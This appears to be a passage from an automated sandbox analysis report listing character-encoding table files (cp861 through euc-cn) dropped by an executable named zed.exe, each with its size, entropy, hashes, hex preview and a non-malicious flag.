                                                                                                                                                                                                                                            Preview:# Encoding file: cp861, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..00C700FC00E900E200E400E000E500E700EA00EB00E800D000F000DE00C400C5..00C900E600C600F400F600FE00FB00DD00FD00D600DC00F800A300D820A70192..00E100ED00F300FA00C100CD00D300DA00BF231000AC00BD00BC00A100AB00BB..259125922593250225242561256225562555256325512557255D255C255B2510..25142534252C251C2500253C255E255F255A25542569256625602550256C2567..2568256425652559255825522553256B256A2518250C25882584258C25902580..03B100DF039303C003A303
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1110
                                                                                                                                                                                                                                            Entropy (8bit):3.5573268031592717
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:CdMHVBUlJvRj7SOVbusZhAMiZyi77q36AqE18wDyV8mK:iMMlBVnrAMiwMmq3E1LmK
                                                                                                                                                                                                                                            MD5:9B4D1B95B20BD67555517DCC3007B22A
                                                                                                                                                                                                                                            SHA1:2C0D6121DB49CDAB6FBAA81398BE2E44BE4E1110
                                                                                                                                                                                                                                            SHA-256:6C15CB256B1C22170292589C6F589E64E164EB36EC7E84F0BD48149BABB7C5FC
                                                                                                                                                                                                                                            SHA-512:34C3E401364D579E8AC7A4E1F1F7A29A84C62E1D5146D7664832639EA3997227DC4BAF1B64DC605E6574D680E61B55D0C69C329E35B1BEC41501FC68C5B634B7
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Encoding file: cp862, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..05D005D105D205D305D405D505D605D705D805D905DA05DB05DC05DD05DE05DF..05E005E105E205E305E405E505E605E705E805E905EA00A200A300A520A70192..00E100ED00F300FA00F100D100AA00BA00BF231000AC00BD00BC00A100AB00BB..259125922593250225242561256225562555256325512557255D255C255B2510..25142534252C251C2500253C255E255F255A25542569256625602550256C2567..2568256425652559255825522553256B256A2518250C25882584258C25902580..03B100DF039303C003A303
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1110
                                                                                                                                                                                                                                            Entropy (8bit):3.518080906819747
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:CXHVBUlJvRj7SOVbusZhAMiZyi77qwGuXVFq5EC18wDyV8mK:eMlBVnrAMiwMmw3VFu1LmK
                                                                                                                                                                                                                                            MD5:C93CCDF65F7F349F22855745660F02AE
                                                                                                                                                                                                                                            SHA1:604888B1FB3C57DF47277CDD1153597BA89E8C36
                                                                                                                                                                                                                                            SHA-256:232D6FE34D7151920232EAAE9C515F36400AB64136DCC5B802D6245AC6F5D56B
                                                                                                                                                                                                                                            SHA-512:D5B65AE7353F694A37AF29177BF1A95477918FC5A002C2FE199624BD5B391698807BAECF54225BC40F62B3CA7912C7066A4AAF01B9E3E399133831CAA342BF4F
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Encoding file: cp863, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..00C700FC00E900E200C200E000B600E700EA00EB00E800EF00EE201700C000A7..00C900C800CA00F400CB00CF00FB00F900A400D400DC00A200A300D900DB0192..00A600B400F300FA00A800B800B300AF00CE231000AC00BD00BC00BE00AB00BB..259125922593250225242561256225562555256325512557255D255C255B2510..25142534252C251C2500253C255E255F255A25542569256625602550256C2567..2568256425652559255825522553256B256A2518250C25882584258C25902580..03B100DF039303C003A303
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1110
                                                                                                                                                                                                                                            Entropy (8bit):3.72017408907567
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:CwHVBUlJvRj7YOVbusZhAMiZyi77qcHj92OibcDQAyUjSG:5MlrVnrAMiwMmSsNcDQvcSG
                                                                                                                                                                                                                                            MD5:146E0D1779D50E070E0EF875E8374DF8
                                                                                                                                                                                                                                            SHA1:B51E5598712598BC387DD79AE80BD879F139140D
                                                                                                                                                                                                                                            SHA-256:81BEBFD9A61E9F17495763B68D57742FAB2A1A43871015699A2C8E5FDED4EC19
                                                                                                                                                                                                                                            SHA-512:1F0DAD8E77712C5A018894332BE72FF5C546C92F481421CCB8553AD6F1E9A18617765C8CEE4187265CCCB1AB073E221289D34C9AB1F0501231D52C81FC1C932B
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Encoding file: cp864, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..00200021002200230024066A0026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..00B000B72219221A259225002502253C2524252C251C25342510250C25142518..03B2221E03C600B100BD00BC224800AB00BBFEF7FEF8009B009CFEFBFEFC009F..00A000ADFE8200A300A4FE8400000000FE8EFE8FFE95FE99060CFE9DFEA1FEA5..0660066106620663066406650666066706680669FED1061BFEB1FEB5FEB9061F..00A2FE80FE81FE83FE85FECAFE8BFE8DFE91FE93FE97FE9BFE9FFEA3FEA7FEA9..FEABFEADFEAFFEB3FEB7FEBBFEBFFEC1FEC5FECBFECF00A600AC00F700D7FEC9..0640FED3FED7FEDBFEDFFE
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1110
                                                                                                                                                                                                                                            Entropy (8bit):3.5193842128126676
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:CsKHVBUlJvRj7SOVbusZhAMiZyi77qZpuHVBnAFj18wDyV8mK:gMlBVnrAMiwMm+VRAFj1LmK
                                                                                                                                                                                                                                            MD5:150B2E00B3F84F8075F3653ED7A4C8E0
                                                                                                                                                                                                                                            SHA1:7131DC656EFE1F2277B19DA72F0EEB46B4EC54A0
                                                                                                                                                                                                                                            SHA-256:ADA1A52064EE93EBE6F8A5D101D01F8776038E12F21A5CA1C006EE833577C705
                                                                                                                                                                                                                                            SHA-512:AC56EEB0220826BF8FF6CA52768DB63961AAC46095A2F3EEBA11B5973CC92AF52DFBBE9E85A0DD04CAB8998212FA2599EDD83BAAA7FB2D394E330FF2F7C015DB
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Encoding file: cp865, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..00C700FC00E900E200E400E000E500E700EA00EB00E800EF00EE00EC00C400C5..00C900E600C600F400F600F200FB00F900FF00D600DC00F800A300D820A70192..00E100ED00F300FA00F100D100AA00BA00BF231000AC00BD00BC00A100AB00A4..259125922593250225242561256225562555256325512557255D255C255B2510..25142534252C251C2500253C255E255F255A25542569256625602550256C2567..2568256425652559255825522553256B256A2518250C25882584258C25902580..03B100DF039303C003A303
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1110
                                                                                                                                                                                                                                            Entropy (8bit):3.5038992968715266
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:CCHVBUlJvRj7SOVbusZhAMiZyi77qb+SAJlz9aRme3cB18wDyVNZkR:bMlBVnrAMiwMm8YnsB1wZy
                                                                                                                                                                                                                                            MD5:FC33B5F773E87696A69E8798446E9772
                                                                                                                                                                                                                                            SHA1:4FC5589C1DD88BB8171758BC173A63B3A5687AE5
                                                                                                                                                                                                                                            SHA-256:32A45DEBA933C7ED99141535087A4C99BA79802175E3F762ACA6EB941157F85A
                                                                                                                                                                                                                                            SHA-512:332D2FEC532192F58F792441E61D675A8692C36BECF768D07F64B8C31561CC1A2DF402625A4719E758A9B59DE4228FFE9F94F067E7DC0D82F9DA2D6500E50304
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Encoding file: cp866, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..0410041104120413041404150416041704180419041A041B041C041D041E041F..0420042104220423042404250426042704280429042A042B042C042D042E042F..0430043104320433043404350436043704380439043A043B043C043D043E043F..259125922593250225242561256225562555256325512557255D255C255B2510..25142534252C251C2500253C255E255F255A25542569256625602550256C2567..2568256425652559255825522553256B256A2518250C25882584258C25902580..0440044104420443044404
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1110
                                                                                                                                                                                                                                            Entropy (8bit):3.5261138894265507
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:CtHVBUlJvRj7SOVbusZhAMiZyi77qii+lh2o5+hdVMQFhWgCDrKE:EMlBVnrAMiwMmXY2o5+hdVMQFhWf3f
                                                                                                                                                                                                                                            MD5:4A2C66AA630D4AE2BF1E7546DCE2DAE5
                                                                                                                                                                                                                                            SHA1:FABB672957D21CA2B4E0EACA5FCE6093BAACF77A
                                                                                                                                                                                                                                            SHA-256:AFE6ED6EB5D07C45B6B928A48BC5EF57EFCF61602D36FF9FBDE4A8EA3FA6DF75
                                                                                                                                                                                                                                            SHA-512:A548002EB7AF8735DBBBCC9883B44B326F261C02A3C7CE65C373755DD92212A66740112EAE0FC556CAD5B86911709C6DF12167DC5B6AD1E01C6F1EB5AB16DB37
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Encoding file: cp869, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..0080008100820083008400850386008700B700AC00A620182019038820150389..038A03AA038C00930094038E03AB00A9038F00B200B303AC00A303AD03AE03AF..03CA039003CC03CD039103920393039403950396039700BD0398039900AB00BB..25912592259325022524039A039B039C039D256325512557255D039E039F2510..25142534252C251C2500253C03A003A1255A25542569256625602550256C03A3..03A403A503A603A703A803A903B103B203B32518250C2588258403B403B52580..03B603B703B803B903BA03
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1110
                                                                                                                                                                                                                                            Entropy (8bit):3.33737382140564
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:CSyHVBUlJvRj7SOVbusZhAMiZyi77qVQEHmEU4AyqU+TWwdd:CMlBVnrAMiwMmWr4AyqUSd
                                                                                                                                                                                                                                            MD5:FC8C876B4738236FC71A1AF96E4566D0
                                                                                                                                                                                                                                            SHA1:DDFDC3F62D99A6BD705CF0719B50F66449C8808A
                                                                                                                                                                                                                                            SHA-256:4F05F31CA026BBFEEEE49ED86504CB060784137A9CFAE0E5954D276E837AB5DE
                                                                                                                                                                                                                                            SHA-512:5BF58A810E029840825FFF3318E90415E6F2B7E46032FD428B4971923D41A64C127A6F438E4894E80EC9604CD34F1D47B4F9A02ABAB3E7D6351611811DC1F2B9
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Encoding file: cp874, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..20AC008100820083008420260086008700880089008A008B008C008D008E008F..009020182019201C201D20222013201400980099009A009B009C009D009E009F..00A00E010E020E030E040E050E060E070E080E090E0A0E0B0E0C0E0D0E0E0E0F..0E100E110E120E130E140E150E160E170E180E190E1A0E1B0E1C0E1D0E1E0E1F..0E200E210E220E230E240E250E260E270E280E290E2A0E2B0E2C0E2D0E2E0E2F..0E300E310E320E330E340E350E360E370E380E390E3A00000000000000000E3F..0E400E410E420E430E440E
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):49008
                                                                                                                                                                                                                                            Entropy (8bit):3.5144574650895364
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:768:R/RPrUHiJrKWkyY/W2wHiwWnwWOORY+gutSY83+JRS:RVUidzJCurDGSYvW
                                                                                                                                                                                                                                            MD5:EF4508C84A025095B183E6BAD67B1ECD
                                                                                                                                                                                                                                            SHA1:D12D5381D50D578AA8687671DC542C462A7F490D
                                                                                                                                                                                                                                            SHA-256:6D1B512110BEAF2CD1296AC878F51D567848AB4A1CED4F18C72806BB136B3D23
                                                                                                                                                                                                                                            SHA-512:E695E7E6F4A11D5E8D62982E26B69B87DB2F1F3D6B6DCCD5F1DF51879F5C4533265CBD7B785E1F2652D8CA3FC913D4F862E7575F67C636314A6E6956FD96E023
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Encoding file: cp932, multi-byte..M..003F 0 46..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..0080000000000000000000850086000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000FF61FF62FF63FF64FF65FF66FF67FF68FF69FF6AFF6BFF6CFF6DFF6EFF6F..FF70FF71FF72FF73FF74FF75FF76FF77FF78FF79FF7AFF7BFF7CFF7DFF7EFF7F..FF80FF81FF82FF83FF84FF85FF86FF87FF88FF89FF8AFF8BFF8CFF8DFF8EFF8F..FF90FF91FF92FF93FF94FF95FF96FF97FF98FF99FF9AFF9BFF9CFF9DFF9EFF9F..0000000000000000000000
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):134671
                                                                                                                                                                                                                                            Entropy (8bit):3.5217328918779645
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:1536:+CwDua7D90Jz1aDJmnMfEGniOQdH6prJs3inqlW6/t9Qwf+zCt5:j1WVRpe3rpt9hf+Gt5
                                                                                                                                                                                                                                            MD5:CF9CFD6329A4FB6C402052B9417DAC3A
                                                                                                                                                                                                                                            SHA1:75CE13FE1E5898D47B67F951C0C228851F1CC04D
                                                                                                                                                                                                                                            SHA-256:B6EC2BE0504CA62B9D1B6857F6BAA13FFAC5A567D4432F4EAB98ADC830F5D9C3
                                                                                                                                                                                                                                            SHA-512:7E19607EEA5342ECFE92D56DAAE82827DE147AE5AFDA8E9D67FD0970F528902CDE20A8A07CF2F341B926E59BB4FF792872976F1C7C5CD351959A71A8B6A1924A
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Encoding file: cp936, multi-byte..M..003F 0 127..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..20AC000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..000000000000000000000
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):132551
                                                                                                                                                                                                                                            Entropy (8bit):3.100976362851161
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:1536:2UO8ecy5KnSMsDlOmNpkQ4oQHnTApv+ngLbiyEY:2U/etc/sBRZp//r
                                                                                                                                                                                                                                            MD5:03E19A4DE3490A7DC50D04EC1F558835
                                                                                                                                                                                                                                            SHA1:9DFECAE08C98109EAA358F5920AED647888F722B
                                                                                                                                                                                                                                            SHA-256:477F8B79B67F4A22C963EE65B9B387DBD8E4B8F62D800B0A51D2276580C6ADBB
                                                                                                                                                                                                                                            SHA-512:7D6AD30AF75A3AA6332A860C6ABF87BF725EB6B4AF3B37699043A10EF3235471C63D0ECB4D437D5AD9438DF5DA646EB55117A9BB8B55EF6868F71E49035C18B7
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Encoding file: cp949, multi-byte..M..003F 0 125..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..0080000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..000000000000000000000
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):93330
                                                                                                                                                                                                                                            Entropy (8bit):3.319807723045599
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:768:aAHU3LIkZlmXrd/uQ0ao98ggKSTEvZPHb6qRL5NpiadDp0ZBFR6YR/fW:aVduBGf9PgFMT6q95GDRBfW
                                                                                                                                                                                                                                            MD5:1D84B025DAB127F2073947D764D307B6
                                                                                                                                                                                                                                            SHA1:4E3D3CBD96D084836F1FE6F2AA497E3FAA463B9B
                                                                                                                                                                                                                                            SHA-256:F80E05533D1A1494C32F9412E9AD2D9C11FAF9AE0668A6F9D1FA5CEEDC6870E2
                                                                                                                                                                                                                                            SHA-512:188D649F9717F20524AFF47F85C3B23AEC3E7825BF54975285D06C17587D581DC24A3F6A7CAB1703DE7AD5521FE2FE2572DE627A81E6A48049A47BB219ED4AF8
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Encoding file: cp950, multi-byte..M..003F 0 88..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..0080008100820083008400850086008700880089008A008B008C008D008E008F..0090009100920093009400950096009700980099009A009B009C009D009E009F..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1113
                                                                                                                                                                                                                                            Entropy (8bit):3.7780987266961663
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:vJMHkUlJvRjmf9RCsUBOdXsCbbNviANpk3m1XFAoE4xSF5HrBPkdn:vKvlA9RCs6CXrViAN51XFA9eSvdPKn
                                                                                                                                                                                                                                            MD5:90FE0C57BBC6C2D8A3324DEB7FD45F3D
                                                                                                                                                                                                                                            SHA1:06B95BE43E4C859A0F1B01384EDD26500C6C1F9E
                                                                                                                                                                                                                                            SHA-256:EB9B262E4D179268E6F017C0D4EF0E7034E31A5B4893595D150640CA1F6A1C45
                                                                                                                                                                                                                                            SHA-512:6A5E67D9F3EC6046C42793E1437B8A6E50EBD72D8EC67FEFEB6DAD6FAB6A5B5C74F939363587D5A6529E217AF54FB8A9CF0F768E114DD931C57887451CACE56E
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Encoding file: dingbats, single-byte..S..003F 1 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..00202701270227032704260E2706270727082709261B261E270C270D270E270F..2710271127122713271427152716271727182719271A271B271C271D271E271F..2720272127222723272427252726272726052729272A272B272C272D272E272F..2730273127322733273427352736273727382739273A273B273C273D273E273F..2740274127422743274427452746274727482749274A274B25CF274D25A0274F..27502751275225B225BC25C6275625D727582759275A275B275C275D275E007F..0080008100820083008400850086008700880089008A008B008C008D008E008F..0090009100920093009400950096009700980099009A009B009C009D009E009F..0000276127622763276427652766276726632666266526602460246124622463..2464246524662467246824692776277727782779277A277B277C277D277E277F..2780278127822783278427852786278727882789278A278B278C278D278E278F..2790279127922793279421922194219527982799279A279B279C279D279E279F..27A027A127A227A327A
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1073
                                                                                                                                                                                                                                            Entropy (8bit):3.0039861897954805
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:XXBcIhJZDgEoQkNCGz0Jyh9lZk3Vmd2QhZLXPiALV3d:dTcNCJEhfZk3Vzox/iqVN
                                                                                                                                                                                                                                            MD5:F7B3771D43BDE6AFF897683BED2FE6AD
                                                                                                                                                                                                                                            SHA1:E70C2C0902413536CB6163752D70F3AE4AF6A967
                                                                                                                                                                                                                                            SHA-256:165BE658AB7D61FFC3DF1E2F1438C2F9FCEE6808A756316302157F44E6D3ACD7
                                                                                                                                                                                                                                            SHA-512:F87DC718EB2DD95237B144FDA090BB636121B9479E492AC94E4F7EBDD88171F070B9E9F6165BDA7B7E2BA2A3E6188B1108D8F91AA5F142CCCFDAD317628DD941
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:S..006F 0 1..00..0000000100020003008500090086007F0087008D008E000B000C000D000E000F..0010001100120013008F000A0008009700180019009C009D001C001D001E001F..0080008100820083008400920017001B00880089008A008B008C000500060007..0090009100160093009400950096000400980099009A009B00140015009E001A..002000A000E200E400E000E100E300E500E700F10060002E003C0028002B007C..002600E900EA00EB00E800ED00EE00EF00EC00DF00210024002A0029003B009F..002D002F00C200C400C000C100C300C500C700D1005E002C0025005F003E003F..00F800C900CA00CB00C800CD00CE00CF00CC00A8003A002300400027003D0022..00D800610062006300640065006600670068006900AB00BB00F000FD00FE00B1..00B0006A006B006C006D006E006F00700071007200AA00BA00E600B800C600A4..00B500AF0073007400750076007700780079007A00A100BF00D000DD00DE00AE..00A200A300A500B700A900A700B600BC00BD00BE00AC005B005C005D00B400D7..00F900410042004300440045004600470048004900AD00F400F600F200F300F5..00A6004A004B004C004D004E004F00500051005200B900FB00FC00DB00FA00FF..00D900F70053005400550056005700580059005A00B200D400D600D200D
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):86971
                                                                                                                                                                                                                                            Entropy (8bit):2.3925661740847697
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:768:UHivP+bFFScXEBFhHeUrUFESCeYjN7GC0nYX:I7FFX2nHeUr8ESCDlX
                                                                                                                                                                                                                                            MD5:C5AA0D11439E0F7682DAE39445F5DAB4
                                                                                                                                                                                                                                            SHA1:73A6D55B894E89A7D4CB1CD3CCFF82665C303D5C
                                                                                                                                                                                                                                            SHA-256:1700AF47DC012A48CEC89CF1DFAE6D1D0D2F40ED731EFF6CA55296A055A11C00
                                                                                                                                                                                                                                            SHA-512:EEE6058BD214C59BCC11E6DE7265DA2721C119CC9261CFD755A98E270FF74D2D73E3E711AA01A0E3414C46D82E291EF0DF2AD6C65CA477C888426D5A1D2A3BC5
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Encoding file: euc-cn, multi-byte..M..003F 0 82..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..0080008100820083008400850086008700880089008A008B008C008D008E008F..0090009100920093009400950096009700980099009A009B009C009D009E009F..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..000000000000000000000
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
